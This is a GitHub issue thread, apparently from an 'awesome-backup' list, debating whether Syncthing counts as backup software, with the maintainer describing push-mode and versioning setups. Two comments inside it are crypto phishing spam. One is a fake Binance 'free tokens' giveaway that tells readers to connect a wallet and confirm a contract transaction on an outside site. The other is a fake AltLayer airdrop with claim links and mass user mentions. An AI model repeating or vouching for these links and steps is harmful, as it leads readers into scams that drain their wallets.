### ISSUE TITLE
Syncthing is not a backup software

### ISSUE THREAD

**Issue by tomasz1986** [oz123/awesome-backup#5]
Hello,

I'm writing this message, because I've stumbled upon your repository, and I can see Syncthing on the list of supposed "backup" software. I'd like to point out that Syncthing is a file synchronisation utility, which is not intended to be used in replacement for a proper backup (see https://docs.syncthing.net/users/faq.html#is-syncthing-my-ideal-backup-application).

The maintainers have underscored this fact whenever possible, yet we still see people coming to the forums for help after losing files in belief that they've been using a backup program. Thus, I'd like to kindly ask you not to advertise Syncthing as "backup", because doing so can easily lead to bad results, especially for less experienced computer users.

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by truth4you** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

davydovanton, @bbilginn, @slashsbin, @ankitm27, @funkybase, @hyalkaf, @indrajithbandara, @0xhanh, @iRecursion, @catsAND, @mudcrab, @jakeprem, @sfter, @creadone, @gLhookniano, @sandeepsingh, @denniszelada, @sunlei, @feici02, @AwesomeHuang

**Comment by oz123** [comment]
I  thought about this very long (3 years now ...), and I finally have a good explanation why I disagree with this.

Syncthing can be used - by POWER USERS - as a very good back up software.

A user can set up very powerful backup strategies:
1. a directory FAN OUT - 1 devices syncs to Multiple devices in PUSH mode.
2. Encrypted remote - a directory sync to untrusted device - the untrusted device receives files encrypted .
3. PUSH to version - syncthing supports versioning on a remote device, such that local changes are propagated to the remote device, but the remote device versions older copies.
4. Retention policies - The remote device can automatically delete files after a while (Staggered File Versioning).

Despite the developers' own warning, you can come up with a great backup mechanism on multiple devices.

Personally, I am doing that on more than 6 latops, 2 working stations and 3 VPS hosts for more than 5 years now.
Before that, I used to back up with deja-dup, and backup was painfully slow, and some family members completely avoided it.
Now, syncthing is running in PUSH mod on their important data, continuously backing up important files.
